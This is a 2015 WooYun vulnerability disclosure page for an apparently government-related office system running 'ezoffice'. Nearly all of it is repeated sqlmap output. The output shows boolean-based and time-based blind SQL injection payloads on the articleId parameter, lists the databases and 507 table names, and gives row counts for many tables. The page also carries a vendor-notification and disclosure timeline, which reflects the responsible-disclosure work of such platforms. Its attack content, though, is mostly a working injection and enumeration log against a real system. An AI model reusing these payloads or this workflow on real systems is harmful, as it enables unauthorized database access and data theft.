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漏洞作者: Yang

提交时间:2015-10-19 16:37

修复时间:2015-12-04 15:58

公开时间:2015-12-04 15:58





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开






sqlmap identified the following injection points with a total of 242 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
| bookmarks |
| cms_advert |
| cms_advert_place |
| cms_arti_chan_ip |
| cms_arti_channel |
| cms_arti_channel_sql |
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| cms_seq |
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| cms_tmpl_file_operation |
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| cms_vote_person |
| document |
| document_file |
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| document_signature |
| document_signature_web |
| ex_elecfile |
| ex_receivefile |
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| ex_sendfilelocal |
| ex_unit |
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| gj_drawdept |
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| gj_employeechange |
| gj_fileinfo |
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| gj_skwj |
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| gj_skwj_file |
| gj_skwj_fileacce |
| gj_ssdetail |
| gj_ssmaster |
| gj_station |
| gj_stock |
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| gj_stockchange |
| gj_typedefine |
| gj_workattendance |
| gj_workcheck |
| gj_worklog |
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| gov_sendfilecheckwithworkflow |
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| gov_wflowresave |
| htmldocument |
| htmlhistory |
| htmlsignature |
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| oa_examination_stock |
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| oa_isodeallog |
| oa_keepwatchplan |
| oa_keepwatchplan_detail |
| oa_library |
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| oa_mail_user |
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| oa_mailattach |
| oa_maildeputy |
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| oa_seq |
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| oa_taskexec |
| oa_taskhistory |
| oa_taskhistoryaccessory |
| oa_taskperiodicity |
| oa_taskperiodicityaccessory |
| oa_taskremind |
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| oa_taskreportaccessory |
| oa_themeoption |
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| oa_trainrecord |
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| oa_waitpigeonhole |
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| org_domain |
| org_employee |
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| org_employee_edustory |
| org_employee_trainhistory |
| org_employee_work |
| org_group |
| org_handrole |
| org_manager |
| org_organization |
| org_organization_user |
| org_right |
| org_rightscope |
| org_role |
| org_role_exchange |
| org_role_right |
| org_syncrtx |
| org_user_group |
| org_user_role |
| record_workflow |
| security_database |
| security_dog |
| security_ip |
| security_log |
| security_log_module |
| security_onlineuser |
| signature |
| tablerelation |
| tarea |
| tareatype |
| tbakup |
| tcode |
| telt |
| template |
| template_bookmarks |
| template_file |
| tfield |
| tlimit |
| tlocate |
| tlocated |
| tmodel |
| tpage |
| tpageref |
| tseq |
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| tshow |
| tsign |
| tsql |
| ttable |
| ttype |
| version_file |
| wf_activity |
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| wf_immobilityform |
| wf_needflowmodule |
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| wf_proceedpress |
| wf_proceedprotectcontrol |
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| wf_proceedtr |
| wf_proceedtransition |
| wf_processscope |
| wf_protectcontrol |
| wf_randflowcomment |
| wf_readwritecontrol |
| wf_transition |
| wf_transitionrestriction |
| wf_work |
| wf_workflowchannel |
| wf_workflowprocess |
| wf_workflowstock |
| wf_workflowwritecontrol |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
| bookmarks |
| cms_advert |
| cms_advert_place |
| cms_arti_chan_ip |
| cms_arti_channel |
| cms_arti_channel_sql |
| cms_arti_comment |
| cms_arti_content |
| cms_arti_draft |
| cms_arti_draft_channel |
| cms_arti_draft_content |
| cms_arti_draft_use |
| cms_arti_keyword |
| cms_arti_links |
| cms_arti_operation |
| cms_arti_publish |
| cms_arti_rela_word |
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| cms_arti_state |
| cms_arti_type |
| cms_arti_version |
| cms_article |
| cms_article_statistic |
| cms_channel_statistic |
| cms_config |
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| cms_files |
| cms_filter_word |
| cms_hotline |
| cms_interview |
| cms_interview_guest |
| cms_interview_info |
| cms_ip_limit |
| cms_ips |
| cms_jobinfor |
| cms_member |
| cms_member_group |
| cms_message |
| cms_message_reply |
| cms_messagecategory |
| cms_module |
| cms_module_operation |
| cms_operation_log |
| cms_page |
| cms_publish_task |
| cms_ques_item |
| cms_ques_person |
| cms_ques_text |
| cms_ques_topic |
| cms_questionnaire |
| cms_role |
| cms_ruesume |
| cms_seq |
| cms_ship |
| cms_site |
| cms_site_statistic |
| cms_site_tmpl_task |
| cms_synch_oa_article |
| cms_synch_oa_channel |
| cms_system_ftp |
| cms_system_log |
| cms_templates |
| cms_templates_files |
| cms_tmpl_citation |
| cms_tmpl_file_operation |
| cms_userpower |
| cms_version |
| cms_vote |
| cms_vote_item |
| cms_vote_person |
| document |
| document_file |
| document_history |
| document_signature |
| document_signature_web |
| ex_elecfile |
| ex_receivefile |
| ex_receivefilelocal |
| ex_sendfilelocal |
| ex_unit |
| gj_csdetail |
| gj_csmaster |
| gj_dossier |
| gj_dossierfile |
| gj_drawdept |
| gj_empchangetype |
| gj_employeechange |
| gj_fileinfo |
| gj_fileslave |
| gj_filetype |
| gj_goods |
| gj_goodsstock |
| gj_goodstype |
| gj_pactlist |
| gj_pactlistfile |
| gj_ptdetail |
| gj_ptmaster |
| gj_qulity |
| gj_qulity_file |
| gj_qulity_fileacce |
| gj_skwj |
| gj_skwj_dw |
| gj_skwj_file |
| gj_skwj_fileacce |
| gj_ssdetail |
| gj_ssmaster |
| gj_station |
| gj_stock |
| gj_stock_goodstype |
| gj_stockchange |
| gj_typedefine |
| gj_workattendance |
| gj_workcheck |
| gj_worklog |
| gov_comefileunit |
| gov_documentsendfile |
| gov_documentunit |
| gov_employee |
| gov_fileread |
| gov_fileread_accessory |
| gov_largemeeting |
| gov_largemeetingappend |
| gov_largemeetingbrowse |
| gov_largemeetingnobrowse |
| gov_largemeetingorg |
| gov_largemeetingperson |
| gov_largemeetingrelapse |
| gov_largemoduleorg |
| gov_largemoduleperson |
| gov_largermodule |
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| gov_leaderactionweekreport |
| gov_meeting |
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| gov_meetingcrux |
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| gov_meetingperson |
| gov_meetingrelapse |
| gov_meetingshare |
| gov_meetingsubject |
| gov_meetingsubjectappend |
| gov_meetingsubjectcomment |
| gov_meetingsubjectcommentcheck |
| gov_meetingsubjectidea |
| gov_meetingunit |
| gov_name |
| gov_onduty |
| gov_ondutyitem |
| gov_ondutyphonerecord |
| gov_ondutyphonerecordidea |
| gov_organization |
| gov_organization_user |
| gov_pleasecheck |
| gov_pleasecheckcomment |
| gov_receiveassociate |
| gov_receivedocumentbaseinfo |
| gov_receivefile |
| gov_receivefileseq |
| gov_receivefiletype |
| gov_rfcategory |
| gov_rfcategory_t |
| gov_sendassociate |
| gov_senddocumentbaseinfo |
| gov_senddocumentnum |
| gov_senddocumentseq |
| gov_senddocumenttopical |
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| gov_senddocumentword |
| gov_sendfile_user |
| gov_sendfilebrowser |
| gov_sendfilecheck |
| gov_sendfilecheck_accessory |
| gov_sendfilecheckcomment |
| gov_sendfilecheckwithwf_acc |
| gov_sendfilecheckwithwf_access |
| gov_sendfilecheckwithworkflow |
| gov_sendfilefeedback |
| gov_sendfilenobrowser |
| gov_sendfilereceivefileorg |
| gov_telgraphcheck |
| gov_telgraphcheckcomment |
| gov_topicword |
| gov_typeset |
| gov_wflowresave |
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| htmlhistory |
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Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
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back-end DBMS: MySQL 5.0.11
Database: ezoffice
| Table | Entries |
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sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11


sqlmap identified the following injection points with a total of 242 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
| bookmarks |
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| document |
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| oa_event |
| oa_eventattender |
| oa_eventshare |
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| oa_examination_answer_item |
| oa_examination_item |
| oa_examination_manage |
| oa_examination_personnel |
| oa_examination_selftest |
| oa_examination_selftest_item |
| oa_examination_stock |
| oa_examination_type |
| oa_festivalset |
| oa_forum |
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| oa_gnome |
| oa_harddisk |
| oa_headseal |
| oa_hortationpunishclass |
| oa_hprecord |
| oa_iformationcaccessory |
| oa_inforhistoryaccessory |
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| oa_infotmationccompany |
| oa_iso_borrowuser |
| oa_iso_paper |
| oa_isocomment |
| oa_isodeallog |
| oa_keepwatchplan |
| oa_keepwatchplan_detail |
| oa_library |
| oa_linkman |
| oa_linkmanclass |
| oa_mail_user |
| oa_mailaccessory |
| oa_mailattach |
| oa_maildeputy |
| oa_mailinterior |
| oa_maillogin |
| oa_mailset |
| oa_mailuserbox |
| oa_maturity_alert_settings |
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| oa_notebook |
| oa_notepaper |
| oa_officaldiction |
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| oa_orgwrap |
| oa_patchinfo |
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| oa_personalstat |
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| oa_persononduty |
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| oa_relationobject |
| oa_remind |
| oa_seq |
| oa_soundremind |
| oa_soundset |
| oa_subject |
| oa_sysnumber |
| oa_task |
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| oa_taskclass |
| oa_taskexec |
| oa_taskhistory |
| oa_taskhistoryaccessory |
| oa_taskperiodicity |
| oa_taskperiodicityaccessory |
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| oa_taskreportaccessory |
| oa_themeoption |
| oa_trainclass |
| oa_trainrecord |
| oa_unitinfo |
| oa_userchannel |
| oa_voiture |
| oa_voitureapply |
| oa_voitureauditing |
| oa_voiturecancel |
| oa_voiturefee |
| oa_voiturefeedback |
| oa_voituremaintain |
| oa_voituresend |
| oa_voituretype |
| oa_waitpigeonhole |
| oa_wishcard |
| oa_workaddress |
| oa_workingday |
| oa_worklog |
| oa_worklogcomment |
| oa_workproject |
| oa_workprojectclass |
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| oa_ysgl_bdp |
| oa_ysgl_bmys |
| oa_ysgl_bmysls |
| oa_ysgl_cgsq |
| oa_ysgl_cgsqys |
| oa_ysgl_ejfl |
| oa_ysgl_kjkm |
| oa_ysgl_txkm |
| oa_ysgl_txkz |
| oa_ysgl_yjfl |
| oa_ysgl_ys |
| oa_ysgl_ysft |
| oa_ysgl_ysls |
| oa_ysgl_zc |
| oa_ysgl_zcb |
| org_domain |
| org_employee |
| org_employee_competence |
| org_employee_contract |
| org_employee_edustory |
| org_employee_trainhistory |
| org_employee_work |
| org_group |
| org_handrole |
| org_manager |
| org_organization |
| org_organization_user |
| org_right |
| org_rightscope |
| org_role |
| org_role_exchange |
| org_role_right |
| org_syncrtx |
| org_user_group |
| org_user_role |
| record_workflow |
| security_database |
| security_dog |
| security_ip |
| security_log |
| security_log_module |
| security_onlineuser |
| signature |
| tablerelation |
| tarea |
| tareatype |
| tbakup |
| tcode |
| telt |
| template |
| template_bookmarks |
| template_file |
| tfield |
| tlimit |
| tlocate |
| tlocated |
| tmodel |
| tpage |
| tpageref |
| tseq |
| tsession |
| tshow |
| tsign |
| tsql |
| ttable |
| ttype |
| version_file |
| wf_activity |
| wf_dealwith |
| wf_dealwithcomment |
| wf_dealwithlog |
| wf_graph_unit |
| wf_immobilityfield |
| wf_immobilityform |
| wf_needflowmodule |
| wf_onlineuser |
| wf_package |
| wf_press |
| wf_proceedactivity |
| wf_proceedflow |
| wf_proceedpress |
| wf_proceedprotectcontrol |
| wf_proceedreadwritecontrol |
| wf_proceedtr |
| wf_proceedtransition |
| wf_processscope |
| wf_protectcontrol |
| wf_randflowcomment |
| wf_readwritecontrol |
| wf_transition |
| wf_transitionrestriction |
| wf_work |
| wf_workflowchannel |
| wf_workflowprocess |
| wf_workflowstock |
| wf_workflowwritecontrol |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
| bookmarks |
| cms_advert |
| cms_advert_place |
| cms_arti_chan_ip |
| cms_arti_channel |
| cms_arti_channel_sql |
| cms_arti_comment |
| cms_arti_content |
| cms_arti_draft |
| cms_arti_draft_channel |
| cms_arti_draft_content |
| cms_arti_draft_use |
| cms_arti_keyword |
| cms_arti_links |
| cms_arti_operation |
| cms_arti_publish |
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| cms_arti_type |
| cms_arti_version |
| cms_article |
| cms_article_statistic |
| cms_channel_statistic |
| cms_config |
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| cms_files |
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| cms_hotline |
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| cms_interview_guest |
| cms_interview_info |
| cms_ip_limit |
| cms_ips |
| cms_jobinfor |
| cms_member |
| cms_member_group |
| cms_message |
| cms_message_reply |
| cms_messagecategory |
| cms_module |
| cms_module_operation |
| cms_operation_log |
| cms_page |
| cms_publish_task |
| cms_ques_item |
| cms_ques_person |
| cms_ques_text |
| cms_ques_topic |
| cms_questionnaire |
| cms_role |
| cms_ruesume |
| cms_seq |
| cms_ship |
| cms_site |
| cms_site_statistic |
| cms_site_tmpl_task |
| cms_synch_oa_article |
| cms_synch_oa_channel |
| cms_system_ftp |
| cms_system_log |
| cms_templates |
| cms_templates_files |
| cms_tmpl_citation |
| cms_tmpl_file_operation |
| cms_userpower |
| cms_version |
| cms_vote |
| cms_vote_item |
| cms_vote_person |
| document |
| document_file |
| document_history |
| document_signature |
| document_signature_web |
| ex_elecfile |
| ex_receivefile |
| ex_receivefilelocal |
| ex_sendfilelocal |
| ex_unit |
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| gj_csmaster |
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| gj_dossierfile |
| gj_drawdept |
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| gj_employeechange |
| gj_fileinfo |
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| gj_qulity |
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| gj_qulity_fileacce |
| gj_skwj |
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| gj_skwj_file |
| gj_skwj_fileacce |
| gj_ssdetail |
| gj_ssmaster |
| gj_station |
| gj_stock |
| gj_stock_goodstype |
| gj_stockchange |
| gj_typedefine |
| gj_workattendance |
| gj_workcheck |
| gj_worklog |
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| gov_documentunit |
| gov_employee |
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| gov_largemeetingrelapse |
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| gov_largemoduleperson |
| gov_largermodule |
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| gov_leaderactionweekreport |
| gov_meeting |
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| gov_meetingsubjectidea |
| gov_meetingunit |
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| gov_ondutyitem |
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| gov_ondutyphonerecordidea |
| gov_organization |
| gov_organization_user |
| gov_pleasecheck |
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| gov_receiveassociate |
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| gov_sendfilecheckwithwf_acc |
| gov_sendfilecheckwithwf_access |
| gov_sendfilecheckwithworkflow |
| gov_sendfilefeedback |
| gov_sendfilenobrowser |
| gov_sendfilereceivefileorg |
| gov_telgraphcheck |
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| gov_typeset |
| gov_wflowresave |
| htmldocument |
| htmlhistory |
| htmlsignature |
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| ms_outmo |
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| oa_boardroom_meetingtime |
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| oa_borrowapply |
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| oa_emp_compo |
| oa_emp_inhabitancy |
| oa_emp_inhabitancy_con |
| oa_emp_performancecheck |
| oa_emp_socialinsurance |
| oa_empmaildomain |
| oa_empmaildomain2 |
| oa_emptype |
| oa_emptype_emp |
| oa_equipment |
| oa_equipmentapply |
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| oa_event |
| oa_eventattender |
| oa_eventshare |
| oa_examination_answer |
| oa_examination_answer_item |
| oa_examination_item |
| oa_examination_manage |
| oa_examination_personnel |
| oa_examination_selftest |
| oa_examination_selftest_item |
| oa_examination_stock |
| oa_examination_type |
| oa_festivalset |
| oa_forum |
| oa_forumclass |
| oa_gnome |
| oa_harddisk |
| oa_headseal |
| oa_hortationpunishclass |
| oa_hprecord |
| oa_iformationcaccessory |
| oa_inforhistoryaccessory |
| oa_information |
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| oa_inforpersonalstat |
| oa_infotmationccompany |
| oa_iso_borrowuser |
| oa_iso_paper |
| oa_isocomment |
| oa_isodeallog |
| oa_keepwatchplan |
| oa_keepwatchplan_detail |
| oa_library |
| oa_linkman |
| oa_linkmanclass |
| oa_mail_user |
| oa_mailaccessory |
| oa_mailattach |
| oa_maildeputy |
| oa_mailinterior |
| oa_maillogin |
| oa_mailset |
| oa_mailuserbox |
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| oa_menuset |
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| oa_mysubscibe |
| oa_netaddress |
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| oa_netaddressshow |
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| oa_netsurveyvote |
| oa_notebook |
| oa_notepaper |
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| oa_orgwrap |
| oa_patchinfo |
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| oa_personoa_feedback |
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| oa_questionnaire |
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| oa_relationmodule |
| oa_relationobject |
| oa_remind |
| oa_seq |
| oa_soundremind |
| oa_soundset |
| oa_subject |
| oa_sysnumber |
| oa_task |
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| oa_taskexec |
| oa_taskhistory |
| oa_taskhistoryaccessory |
| oa_taskperiodicity |
| oa_taskperiodicityaccessory |
| oa_taskremind |
| oa_taskreport |
| oa_taskreportaccessory |
| oa_themeoption |
| oa_trainclass |
| oa_trainrecord |
| oa_unitinfo |
| oa_userchannel |
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| oa_voitureapply |
| oa_voitureauditing |
| oa_voiturecancel |
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| oa_voiturefeedback |
| oa_voituremaintain |
| oa_voituresend |
| oa_voituretype |
| oa_waitpigeonhole |
| oa_wishcard |
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| oa_workingday |
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| oa_worklogcomment |
| oa_workproject |
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| oa_ysgl_bdp |
| oa_ysgl_bmys |
| oa_ysgl_bmysls |
| oa_ysgl_cgsq |
| oa_ysgl_cgsqys |
| oa_ysgl_ejfl |
| oa_ysgl_kjkm |
| oa_ysgl_txkm |
| oa_ysgl_txkz |
| oa_ysgl_yjfl |
| oa_ysgl_ys |
| oa_ysgl_ysft |
| oa_ysgl_ysls |
| oa_ysgl_zc |
| oa_ysgl_zcb |
| org_domain |
| org_employee |
| org_employee_competence |
| org_employee_contract |
| org_employee_edustory |
| org_employee_trainhistory |
| org_employee_work |
| org_group |
| org_handrole |
| org_manager |
| org_organization |
| org_organization_user |
| org_right |
| org_rightscope |
| org_role |
| org_role_exchange |
| org_role_right |
| org_syncrtx |
| org_user_group |
| org_user_role |
| record_workflow |
| security_database |
| security_dog |
| security_ip |
| security_log |
| security_log_module |
| security_onlineuser |
| signature |
| tablerelation |
| tarea |
| tareatype |
| tbakup |
| tcode |
| telt |
| template |
| template_bookmarks |
| template_file |
| tfield |
| tlimit |
| tlocate |
| tlocated |
| tmodel |
| tpage |
| tpageref |
| tseq |
| tsession |
| tshow |
| tsign |
| tsql |
| ttable |
| ttype |
| version_file |
| wf_activity |
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| wf_dealwithcomment |
| wf_dealwithlog |
| wf_graph_unit |
| wf_immobilityfield |
| wf_immobilityform |
| wf_needflowmodule |
| wf_onlineuser |
| wf_package |
| wf_press |
| wf_proceedactivity |
| wf_proceedflow |
| wf_proceedpress |
| wf_proceedprotectcontrol |
| wf_proceedreadwritecontrol |
| wf_proceedtr |
| wf_proceedtransition |
| wf_processscope |
| wf_protectcontrol |
| wf_randflowcomment |
| wf_readwritecontrol |
| wf_transition |
| wf_transitionrestriction |
| wf_work |
| wf_workflowchannel |
| wf_workflowprocess |
| wf_workflowstock |
| wf_workflowwritecontrol |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
| Table | Entries |
| cms_site_statistic | 8072284 |
| cms_channel_statistic | 1164104 |
| cms_article_statistic | 831459 |
| cms_operation_log | 12956 |
| cms_system_log | 11010 |
| oa_district | 2476 |
| cms_arti_operation | 1508 |
| cms_arti_content | 1402 |
| cms_article | 1402 |
| cms_arti_version | 1213 |
| security_log | 990 |
| cms_files | 826 |
| cms_templates_files | 552 |
| org_role_right | 213 |
| cms_tmpl_citation | 202 |
| cms_config | 197 |
| wf_immobilityfield | 193 |
| org_syncrtx | 191 |
| cms_arti_channel | 106 |
| wf_readwritecontrol | 94 |
| org_right | 85 |
| cms_module_operation | 75 |
| oa_eventattender | 64 |
| org_user_role | 59 |
| oa_custmenu | 55 |
| oa_menuset | 55 |
| org_rightscope | 43 |
| tshow | 37 |
| cms_message | 34 |
| security_log_module | 25 |
| oa_patchinfo | 19 |
| tsign | 19 |
| wf_needflowmodule | 17 |
| wf_package | 17 |
| wf_immobilityform | 16 |
| oa_diaryclass | 15 |
| org_employee | 15 |
| template_bookmarks | 15 |
| cms_userpower | 14 |
| org_organization_user | 14 |
| bookmarks | 12 |
| tareatype | 9 |
| ms_model | 8 |
| wf_transition | 8 |
| cms_message_reply | 7 |
| org_organization | 7 |
| org_user_group | 7 |
| cms_module | 6 |
| cms_page | 6 |
| cms_templates | 5 |
| document | 5 |
| document_file | 5 |
| oa_departmentstyle | 5 |
| org_role | 5 |
| wf_transitionrestriction | 5 |
| cms_advert_place | 4 |
| cms_arti_state | 4 |
| cms_tmpl_file_operation | 4 |
| ttype | 4 |
| wf_workflowprocess | 4 |
| cms_advert | 3 |
| cms_arti_source | 3 |
| cms_ques_topic | 3 |
| cms_role | 3 |
| cms_site | 3 |
| oa_maturity_alert_settings | 3 |
| tarea | 3 |
| telt | 3 |
| tsession | 3 |
| wf_activity | 3 |
| cms_content_style | 2 |
| cms_ip_limit | 2 |
| cms_ips | 2 |
| cms_member | 2 |
| cms_member_group | 2 |
| cms_ques_item | 2 |
| cms_site_tmpl_task | 2 |
| cms_vote_item | 2 |
| oa_equipment | 2 |
| oa_relationobject | 2 |
| org_group | 2 |
| tcode | 2 |
| cms_arti_draft | 1 |
| cms_arti_draft_channel | 1 |
| cms_arti_draft_content | 1 |
| cms_arti_keyword | 1 |
| cms_arti_rela_word | 1 |
| cms_arti_type | 1 |
| cms_filter_word | 1 |
| cms_interview | 1 |
| cms_interview_guest | 1 |
| cms_messagecategory | 1 |
| cms_publish_task | 1 |
| cms_questionnaire | 1 |
| cms_seq | 1 |
| cms_synch_oa_channel | 1 |
| cms_version | 1 |
| cms_vote | 1 |
| gov_receivedocumentbaseinfo | 1 |
| gov_senddocumentbaseinfo | 1 |
| oa_pigeonholeset | 1 |
| oa_seq | 1 |
| oa_unitinfo | 1 |
| org_domain | 1 |
| org_manager | 1 |
| security_dog | 1 |
| tfield | 1 |
| tmodel | 1 |
| tpage | 1 |
| tseq | 1 |
| ttable | 1 |
| wf_workflowchannel | 1 |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: articleId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=759 AND 4227=4227
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: articleId=759 AND SLEEP(5)
web application technology: JSP
back-end DBMS: MySQL 5.0.11



版权声明:转载请注明来源 Yang@乌云





确认时间:2015-10-20 15:57



